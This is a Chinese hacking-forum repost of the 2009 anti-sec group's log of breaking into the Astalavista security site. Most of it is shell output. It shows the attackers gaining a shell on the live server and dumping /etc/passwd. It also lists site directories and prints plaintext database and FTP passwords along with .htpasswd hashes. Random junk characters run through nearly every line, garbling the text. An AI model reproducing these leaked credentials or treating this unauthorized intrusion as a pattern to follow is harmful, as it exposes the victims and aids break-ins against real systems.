中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]

作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
- N! X* \9 c( E) K0 K! j" l* @
, k0 Y7 e* g$ |% \8 n, J* `+ u: m[root@front3 ~]# curl -I litespeedtech.com
7 p! {/ B) _. {1 I1 R/ XHTTP/1.1 200 OK
- _* V9 R* E$ Z+ L5 m) a$ @% {: W- IDate: Fri, 05 Jun 2009 22:54:51 GMT( p$ {7 o5 C: x
Server: LiteSpeed3 [8 i5 h* b4 n1 }) L5 R- j. q
( L, ^6 C# T# h
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-3 l: l3 q7 Z9 \0 s! r+ t! m$ T+ z) `$ E

7 {' K2 t4 C+ S& D有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。  k$ G8 C# Z0 o- {) p4 Y& b

0 \+ I: R0 u. E
* X6 ]0 l- Y3 ~. ?/ `; S+ \# j/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
5 m. r6 c! E3 u+ P+ e4 a/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \7 a/ @( k" G9 A% ^% Z3 H
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
1 n  Z4 i; Y/ w: i$ A' d\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
/ a! {6 Y+ v. U  V* I        \/        \/                 \/        \/       \/                     \/                 \/
  ~! E" V5 `% N0 l0 S' j                                  The Hacking & Security Community' V- j, E3 V7 H2 n& g- y
[+] Founded in 1997 by a hacker computer enthusiast
: Q6 i1 \: g+ Z/ V9 b[-] Exposed in 2009 by anti-sec group
# O, q5 R& |- u7 H+ w) R6 I9 @
+ h+ w" T0 L( g0 q9 yFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:" @2 @$ Q2 _3 ?
>> 03. Who’s behind the site?$ Y6 A/ F. z. o- U6 q2 N! v
>>0 @2 I) v4 ^' K% {/ d
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
! k7 H4 f, u: N1 ]
5 [4 v$ l# }7 [, p( {7 S( N>> 05. Is it true that the site is visited by script-kiddies and warez fans only?' L8 {2 V5 e5 J9 ]; {" {
>>' @8 c! P4 l1 k: d) p9 Y# J
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and" W; p0 o. C! q7 r/ F6 p
military institutions.1 s1 e8 o7 O7 v% x7 r
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
6 V0 C5 z  r* D( M5 Z: P3 b- U! D; E6 u# j& g
Why has Astalavista been targeted?, D" @) ^& j# h$ d# z& t7 U
6 x: W8 I+ [! U0 T  f
Other than the fact that they are not doing any of this for the “community” but
6 s/ C! ?" D; T5 L) S/ A2 V: ffor the money, they spread exploits for kids, claim to be a security community
$ E* l! c; c, e" E$ j(with no real sense of security on their own servers), and they charge you $6.662 o0 @; J8 M* k4 s
per months to access a dead forum with a directory filled with public releases
5 h4 q9 h% |" e) ^* q, k8 xand outdated / broken services.0 A1 j3 b, K; @. L; V
& a) \$ F% ]; y$ j) x/ c) N
We wanted to see how good that “team of security and IT professionals” really is.0 C( ^  k7 Q$ S) N3 J' k; ~8 Q4 i
( d$ w1 G2 F) }
Let’s begin.2 |; [7 |* U3 j! |/ k

/ C, D' c% B7 \/ eanti-sec:~# ./g0tshell astalavista.com -p 80
9 a$ r# X: i& Q; a# b" _, X[+] Connecting to astalavista.com:80
4 i# K& [/ v6 \& ?; Z[+] Grabbing banner…
: I. e) S2 v  R9 lLiteSpeed4 D- n1 r3 X8 o$ U" j7 X
[+] Injecting shellcode…3 p* j. j. T, A5 `( K
[-] Wait for it
0 V/ z6 o$ U1 P- c' l; |& s' X0 g6 n+ j2 J2 r
[~] We g0tshell
) U; ~1 g; i% L. }. zuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
. a# L( A6 f7 M6 H' n; D$ W1 CID: uid=100(apache) gid=500(apache) groups=500(apache)! s7 h' r" Q! R6 M4 v

9 G: |. C  i# ~) bsh-3.2$ cat /etc/passwd
- S0 K3 D* D2 S) j' O2 f0 g& Iroot:x:0:0:root:/root:/bin/bash% |% w9 C; ~& B& U
bin:x:1:1:bin:/bin:/sbin/nologin* O+ P0 V$ o7 t# ~3 \
daemon:x:2:2:daemon:/sbin:/sbin/nologin2 j# e8 l% X! c+ O8 J
adm:x:3:4:adm:/var/adm:/sbin/nologin8 }4 A, o# W* X  |4 X- _
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
/ r' O3 D- l3 U2 t/ Ksync:x:5:0:sync:/sbin:/bin/sync
' p# U4 `- O/ s! K! c0 ~% e; `shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown) G4 f7 {' X* c9 m
halt:x:7:0:halt:/sbin:/sbin/halt
7 {, F# H1 s* u: `3 _mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  u2 ?) h2 m& M3 J
news:x:9:13:news:/etc/news:8 ]$ Y7 Q0 n  \0 m- h$ @
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin: f9 |# i3 M/ B/ C/ s: \
operator:x:11:0perator:/root:/sbin/nologin
! k* E7 x! w; qgames:x:12:100:games:/usr/games:/sbin/nologin
! p+ h: m" J: P$ E- M3 O, ?gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
4 o: S/ N. d9 {$ X. H% pftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  X; v- h: E+ D- Unobody:x:99:99:Nobody:/:/sbin/nologin
4 o7 [; e1 |0 C$ ^- {rpm:x:37:37::/var/lib/rpm:/sbin/nologin
! G& C8 S* [  H1 X/ ]. R2 f, H/ Udbus:x:81:81:System message bus:/:/sbin/nologin& Z$ U, [0 M; l9 x- ~- J
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
9 s' g" V# ~6 `: T# U- @mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
" {" E' N8 Z! @& K5 @smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin0 t' k" S  S/ G6 W9 ?8 J, e
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin# W5 n  D* A/ d9 |
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
9 x: M; l( K% k/ I  T( Nrpc:x:32:32ortmapper RPC user:/:/sbin/nologin
5 F; n! v: f8 Y. D+ g' `) Jrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
/ p; t  y& Y! C' _7 Anfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
* s' g& P, B, @( s" V; F$ \sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin/ A4 F  D- w3 t# d) I- ^: O
pcap:x:77:77::/var/arpwatch:/sbin/nologin
( t; W. g, I+ X) V+ M4 J& Qnamed:x:25:25:Named:/var/named:/sbin/nologin
1 W: C0 e# Y& M8 A" j. Capache:x:100:500::/var/www:/bin/false0 X: v( ?! @; ?
diradmin:x:101:101::/usr/local/directadmin:/bin/bash# b+ j- M4 i' D( {9 b5 X! Q
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash2 J+ V5 U; l. j, d% ~' y
webapps:x:500:501::/var/www/html:/bin/bash; I4 q. m3 a. U( M
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash% O  w4 ]2 L. e9 c
admin:x:501:502::/home/admin:/bin/bash0 S( I5 e: M8 _6 y
jon:x:502:503::/home/jon:/bin/bash6 }/ \( b1 {. C0 F
com:x:503:504::/home/com:/bin/bash
! [& Q6 `" J) a+ U# k! [ntp:x:38:38::/etc/ntp:/sbin/nologin6 I; u2 @6 C* A! z
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin( L; K  f! D' d! L
astanet:x:504:505::/home/astanet:/bin/bash6 A) i* s1 k; w
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
5 n: k  h6 O' x% x- ]! Pavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
8 p$ _2 D* a6 K, e- j, A
# V+ Y% E! S3 H7 [8 P& h( tsh-3.2$ cat /etc/hosts
9 T0 k- I; D7 I# Y# Do not remove the following line, or various programs
. i% q! H$ i8 R' L" ]* h+ T# that require network functionality will fail.6 k# l+ P% o3 H6 ~4 b
127.0.0.1       localhost.localdomain   localhost! Z. o, I4 S* t( d
::1     localhost6.localdomain6 localhost6
* k  |, @7 \* [80.74.154.172           asta1.astalavistaserver.com
, k. g# T' B0 ]1 n8 h/ K. ^# i- d' `6 e# z% z% y
sh-3.2$ pwd
& e6 i" B# u. {; F/home/com/public_html
+ q) l# J! K, l& }# O! j* \) ^$ X! H
sh-3.2$ ls -la6 I4 S" }2 g" a6 X$ c
total 18460$ E  [9 ~+ k  I/ K) e
drwxr-xr-x 30 com apache     4096 May 28 17:06 .1 [, [- s0 Q8 y0 z
drwx–x–x 11 com com        4096 Jun 25  2008 ..1 }8 ~* _5 a4 ^2 r# v! S
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
" V/ ^+ t! {3 k3 |! P% Hdrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache& j# k) B/ A3 J7 Q5 r5 h
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
% H- k/ M) v, O/ ]0 Wdrwxrwxrwx  2 com com        4096 May 19 00:50 config
9 v* W- F! U  F6 Tdrwxr-xr-x  2 com com        4096 Mar 20 11:05 core- r) ~. Y/ k* F+ J6 r: v) p: M0 C$ K
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules" g  c- u! a+ n( |
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing$ J0 r: y' D0 N2 v. U
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
/ R0 y$ `$ V. s1 b. I- \+ K3 pdrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__* o, |* ]0 Z' E$ s" [, d" p& k
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
- Q3 I$ [1 t" O4 e+ ]3 i( K+ y* sdrwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
  X+ b0 e+ ]4 |/ {. [. u2 zdrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor% h2 t" K, Q% {3 H$ v
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
( z4 p7 F, i1 I6 a/ y4 u: @drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed  Z% ^% }; f, Z- M
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess2 y- G% ]2 `1 S0 |; q
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
- ?) T8 O+ r  k7 @-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
7 E4 J+ p0 w2 ]5 G$ u' s2 Odrwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool0 ~! U7 Z+ n+ c7 x8 j; F  \
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
% ~2 S* a! u! j# d3 _) ^, S* _-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php6 K" G9 }  p  M$ B1 E+ q/ g
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
8 ?& e8 H# p; |  {0 fdrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang  ?* N' l8 X0 R2 n6 u+ `$ b6 S
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
; V3 L' h3 |* [. _! |: O4 [drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
& r7 ]5 Y9 o' y# Zdrwxr-xr-x  8 com com        4096 May 11 12:48 modifications
! J. m% D+ d* |/ \& S/ cdrwxr-xr-x 34 com com        4096 May 28 16:30 modules( o* O, z5 w- `9 d# S, Z  W% e
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin- L0 R2 x" `8 J
drwxrwxr-x 22 com com        4096 May 28 17:06 _new4 U7 K2 Y4 g* D7 {0 Q
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old6 A" n% [# \4 {
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
- c% O( b+ ^9 v6 |; D* d, Y2 X. j- Ldrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy  ~( U' j; C% r+ q9 U$ _+ U+ e
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt; T+ n. u' {, T( h  J  E+ l4 l
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
) Q& h( J6 x2 N) i-rw-r–r–  1 com com         223 Mar 30 15:32 test.php7 _3 E. _8 e. v% w; v; @
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
8 K# i# P6 C+ R; M* x4 X4 qdrwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
- P; F+ ^- _" O; ~/ Zdrwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
: S9 @7 g( P5 e6 _4 T+ ^3 Y1 A0 \; T$ H+ C
sh-3.2$ head -20 index.php- t6 m( O8 |7 d
<?php! t7 Y4 @" l; n: L* m, Q

% K: k2 _5 Y  q3 k/**
5 s% @7 ~' |% C& \1 X3 ]* The main page for the CMS) U  P# A5 b- y. v" B
* @copyright   CONTREXX CMS - COMVATION AG
# O1 t2 o9 ?3 W& U5 k7 }5 M* @author      Comvation Development Team
1 i2 O1 y, o8 c+ p. o* @version     v1.0.9.10.1 stable
; \) \$ q" ~1 V+ D# J% z* @package        contrexx/ B- B( o3 }2 {. A
* @subpackage    core
! |4 X6 B& H% E" m' b" j* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
) |: G/ D1 A: t" ~" K. J* @since       v0.0.0.0
  A, o3 }8 w5 u* @todo        Capitalize all class names in project4 A3 c0 Q' |7 y4 W2 j
* @uses        /config/configuration.php- K. y& ^3 r1 {$ s
* @uses        /config/settings.php
( U9 M# v' |! ?* @uses        /config/version.php
- E- ^  m2 T9 w! _3 Y' X8 z, n5 t* @uses        /core/API.php
+ z6 @3 O! o- y' y: p* @uses        /core_modules/cache/index.class.php/ _& J- m" _0 s% M8 k* ?! u
* @uses        /core/error.class.php% P3 Y% q# g8 [' A
* @uses        /core_modules/banner/index.class.php
$ y. E$ e2 q2 X7 n# t0 ?* r" j" N. |* @uses        /core_modules/contact/index.class.php
0 j3 e7 e2 e6 `5 b/ n: H0 _- N' u
sh-3.2$ cd config/: m' \1 e7 }5 O' C( b8 e1 A
sh-3.2$ ls -la: k' J4 {# \6 w3 B) w
total 32
- G3 f% `" t6 }+ Z; V1 sdrwxrwxrwx  2 com com    4096 May 19 00:50 ." _" v- B* w' `3 d: s& A9 T; v
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
% v. W. M  D) d( H; s0 ?7 [5 M, u7 T5 P-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php' o% F( U# J( U. V' k( ?8 d
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
1 H; `. s8 X. R9 q6 |  |-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
: N3 l; c! ~$ ^% c-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php& q: l# [$ [+ K% k) O: z! m
) B$ ~: S$ K0 _* N: H+ r" I; R
sh-3.2$ cat configuration.php
1 i9 u( B; Z$ C[snip]
& j5 S/ e; P+ P( C/ ]9 ?$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost/ L5 H) Y+ o6 C  ^
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name- c  s; i% s6 V8 Z
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix* K3 w. s# H6 E& ?' M$ X) u  a
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username/ g1 r5 q* s5 R  p% N
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
$ P# M: V& l! N$ L* ~; B$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
( L1 G( Y5 C! W: ?( A$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
: W' t# `, d, g% u* R! j[snip]" f5 Y) @3 t! F6 P0 d" B, \
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
( ~4 Y- W: D; b" ?3 h1 ]2 C% C* w$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode4 @  }( X: W0 j1 K9 ]
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
  ^, a$ G; Y! x! s* C$_FTPCONFIG['port'] = 21; // Ftp remote port
' G9 J. V. S: Y! r/ v9 q$ T; u) J$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username: J$ Q) G; s3 H, d* P* \; e  m
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password1 ?# {% b0 K* Y
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
9 U8 e; V4 _9 e7 L) b3 z: m
( T% o2 z3 T* K5 C8 \sh-3.2$ cd ..( D* i7 w5 m' y" `
sh-3.2$ cd dvd/7 v! l4 [& J7 |5 Y* \
sh-3.2$ ls -la
) _% P  W+ W( b/ H" h6 _total 2913780
) x1 Q. C! ]! N2 m' `  pdrwxr-xr-x  2 com com          4096 Sep  9  2008 .
& ^: p/ T8 Y0 zdrwxr-xr-x 30 com apache       4096 May 28 17:06 ..1 D, U: U, \) S' }8 s% M) _( X# x9 f
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
% J" J" Z- r& J7 W* |/ H$ Z-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
; T9 m8 m: {, `-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
' r- \- a- J' x5 f% R7 M+ Q-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess! M( t/ h% v+ W2 z" X

, ~6 {# \# `: @, vsh-3.2$ cat .htaccess
0 Q% i, ?  H6 U2 s3 B) ?6 CauthType Basic: r2 f  M7 }3 }! m- F+ e1 ^7 O
authName DVD
% _& O( _2 h/ b' ]$ E/ j& j; zauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 p8 U1 A9 i& f$ c: l& H
require valid-user
* E* \3 E6 G! ]
3 n5 c0 D4 V; o1 w, Gsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
+ W* h( j. k$ Z+ h9 B) CDVDdownload:CRD8cuY6.MPT62 I( z, @. ^. {, x, }0 c
DVDdownload2:CR8a36.wluFMg
. y- Q& T# t  }) X' {& e' N, V( G- B+ Z  Z4 t
sh-3.2$ cat test.php
9 \$ O3 |9 ?: l+ [0 f<?php/ r' M7 d4 F* z( s
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
, f" Q. R% ^3 X7 G' g" M% u- |+ F$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));- I' a0 J  q, M( l( ~
echo $url;# @( ?. F1 [* J# {
?>
5 r6 ]) |; d' U1 l4 _" h
& e) Y! a8 }, J: V2 K2 Bsh-3.2$ cd modifications// Q' h" Y& l6 O
sh-3.2$ ls -la
% E/ G' X; U" x9 ~* Qtotal 32
4 Y1 N0 s3 `5 `. ^0 Y3 Xdrwxr-xr-x  8 com com    4096 May 11 12:48 ." I! b# q* C& t' }7 c
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
% L0 F7 N, L! @6 f+ t, [' h$ V8 d0 ydrwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
5 I* i& I# }4 {' D' F$ udrwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs) ^5 y3 z8 r. @
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools: |+ D1 X+ k' n! W2 R
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
: E+ v7 w# x0 p) Fdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
' L; T8 J- l4 O6 F- Z% M3 `. @drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp: M$ N) d, V: U9 p: y

- G( v& w( z8 |+ i9 I5 B: r( w. b2 osh-3.2$ ls -R
  b  G9 j  w( m& Q  S: q.:
- j( H) }! e0 ycom_avtng  cronjobs  onlinetools  pjirc  search  _tmp8 H, ~4 Z# H/ J! g
& `- V% N; s& V  k
./com_avtng:/ @* f8 f" S, E1 P7 X' N- k
avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts  r3 S5 J9 ^4 w$ d& O) d/ }( s
$ `2 }9 O8 t; O3 c8 k" k
./com_avtng/scripts:
) W; |3 w& n6 K, y; u$ E1 B5 O- I; ?popunder.js
3 [) i# s, ], b- {" U. R" q  H0 Z3 T% E8 f( g+ L! ?
./cronjobs:# C  E, h. I- {9 L4 f% q
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp9 u6 X# c4 o2 Q! v

3 B) M/ E2 B1 K- Z: _./cronjobs/tmp:
' i0 x- f8 L* i! m( y6 u1 ccontrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv4 A7 x% V: _3 N& G* [( A4 G  t/ n8 H
! {& D& @& c( A0 \- ^
./onlinetools:
7 I5 j6 I+ ~1 X9 A+ }9 dindex.php4 Q/ _5 b, A) S; ?, T( Y2 c9 J

/ H( a2 k$ J2 o./pjirc:+ v9 I% _$ N1 d+ _" M
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
3 c$ x! d+ V+ S4 [6 w4 AAppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt+ n( p; t& [3 D# B: U) ]  A! M
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
2 h8 V) A7 ~& ?
: Z0 t/ f7 B* a6 V; p) h; Q2 R( W./pjirc/img:
3 e; _. A: N8 Iange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif7 \. G: J9 D$ P' J; t' |% w
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   # `& ^. n/ H; q1 L' W
verre-eau.gif
4 {, c# S# {, v) O" F0 w9 Q( e7 @+ aargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
* J" r# P* p6 Averre-vin.gif0 p2 [3 c1 N/ D! D
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
& m/ D, g! d! Q4 ?( jbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
9 w0 J  D4 Q9 d0 r  U  N* N" b$ l' k
) z3 K! C8 X9 t# o./pjirc/snd:  K; C: _6 m% p8 }4 \
bell2.au  ding.au
6 `( f' }: G7 z% |. S
7 B( x1 ?! e  }) r" J; n- L9 @./search:
# M" h: |8 y: ~searchEngines.php  search.php
4 I* G! a* X" ^- m$ @. T$ y+ L& b$ r) V9 ~% }. p; C% a
./_tmp:
5 b+ y4 O; p2 {0 fdefaultPorts.php  defaultPorts.txt
3 q0 e) c/ Z: j
' ~& I: Y; }7 s- d5 h  H8 Bsh-3.2$ cd cronjobs/% S; i" r/ a" O, ]
sh-3.2$ cat exploits.php
$ A" K' z2 y* f2 P[snip]
$ ~  g6 U4 E- v) d" e  u$categories   = array();  O; v% T  w- m. X- r
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;  L) f6 o4 C1 H$ l" T+ ~
$expolits     = file($milw0rmFile);
0 X6 k9 S; }3 t4 X$comExploits  = array();, z4 b, O# D0 G5 Z& i5 ^
[snip]4 L6 G6 r. w) R  \. g
// manage data
. i  O1 l0 T3 o$ Rfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640( H5 q9 J2 p" q% O9 w

5 w# n: T. i& C# |; q% {    // get path and title
7 p4 n: v. t& e7 W3 ]1 r, x    $expolits[$x] = trim($expolits[$x]);
$ M4 E+ {" I4 h# L9 ?    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));9 \- z0 y8 N, \/ T$ x6 y7 ]
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
6 n1 r4 O, H+ p; g1 K& c2 C3 O; ?* |, Q, ?
    // check if file exists$ L4 l) s3 V" A  y" ?
    if (file_exists($path)) {! M3 G- r0 C: f% Z/ |0 H' H

. U% N5 W8 a; `        $text = file_get_contents($path);
$ \8 i+ O9 r+ v; `- a1 `' H0 W7 {1 X' |/ `
        // get content and date* x  ^- ~" v- H7 F
        //$text = htmlspecialchars($text, ENT_QUOTES);
. F  f9 X9 {# G& u5 f  T9 B        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
4 p* U- |$ e% r6 D" Q3 c5 b        if ($tmptext != ”) {
) w. P: C" U' t, S! X& j            $text = $tmptext;# P+ M/ ]7 @) o5 g
        } else {8 S: S7 K. n/ K& U, B1 C
            $text = addslashes(htmlentities($text,  ENT_QUOTES));
+ N1 X( ]# c( g5 K        }5 ~0 S& o# g$ f9 z
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));- F4 m9 [0 r) S# P6 [$ C/ d! B( I2 S
        $tmp  = explode('-', $date);
% Q2 f% s3 l) {& {2 i+ z        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));6 y$ J+ l  G2 S
        $cat  = getCategory ($path);
: \& q( A/ M$ c3 G$ t        $ext  = pathinfo(basename($path));3 R- z4 S  L* C4 @- |3 Y
        $ext  = $ext['extension'];
  q) j2 _5 |. a8 ~  [        $qStr = ”
9 l# B- R8 X- Z: l1 C2 R( L. |            SELECT  `id`
4 K5 E% r8 R4 t& S8 C. \6 f            FROM    `contrexx_module_exploits`5 |- F8 n3 S4 U
            WHERE   `title`  =  ‘” . $title . “‘
& P* \2 O6 U3 i- x% D            AND     `date`   =  ‘” . $date . “‘8 P. ^/ P9 y: N  L! F
        “;
" s  b" n- G2 v9 e* [- T        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
2 n* s- p! w2 I# ~: v8 L        $q = $_objDB->query($qStr);
3 R1 @8 b9 Q1 w9 |2 Y% c5 T) D
! }- r' M* y5 K* }0 D        if ($q->numRows() == 0) {0 [2 J6 Y4 z$ ?3 }; Z1 ~2 p3 {
* W' z* ^9 h+ D
            // prepare array
! i7 e$ u& {; j% c            $comExploits[$x]['date']      = $date;& L. u( e" I5 U* V
            $comExploits[$x]['title']     = $title;
. R4 F5 A: u" I* z9 w            $comExploits[$x]['author']    = ‘milw0rm’;
8 |1 k4 r8 P/ t. E1 L/ J2 d* j. L            $comExploits[$x]['text']      = $text;
: s+ W+ r! N- B6 r0 n            $comExploits[$x]['source']    = $ext;5 t# Y) o1 e8 g( C0 Q  k/ ^
            $comExploits[$x]['url1']      = ”;
# n$ u# X4 t9 V& C! ~! n            $comExploits[$x]['url2']      = ”;
( V+ h; K7 T7 G7 o            $comExploits[$x]['catid']     = $cat;
0 u$ h- x$ x( W1 t2 P  S) [' G            $comExploits[$x]['lang']      = ‘2′;; b( Z( T- c: I6 D' p
            $comExploits[$x]['userid']    = ‘12′;
1 S2 w7 A& V, ]% D( I: ?; J+ ?2 L            $comExploits[$x]['startdate'] = ‘0000-00-00′;* `$ m- o. F  o# [+ O& q# R7 ^
            $comExploits[$x]['enddate']   = ‘0000-00-00′;7 q5 z  D0 _- T2 i2 \" N* t2 ?
            $comExploits[$x]['status']    = ‘1′;$ `4 N; Q; [: M- P
            $comExploits[$x]['changelog'] = $date;
1 M! V0 W% k4 B. }) ^- W! s6 S
+ N. w+ n* A" R! D9 x        }
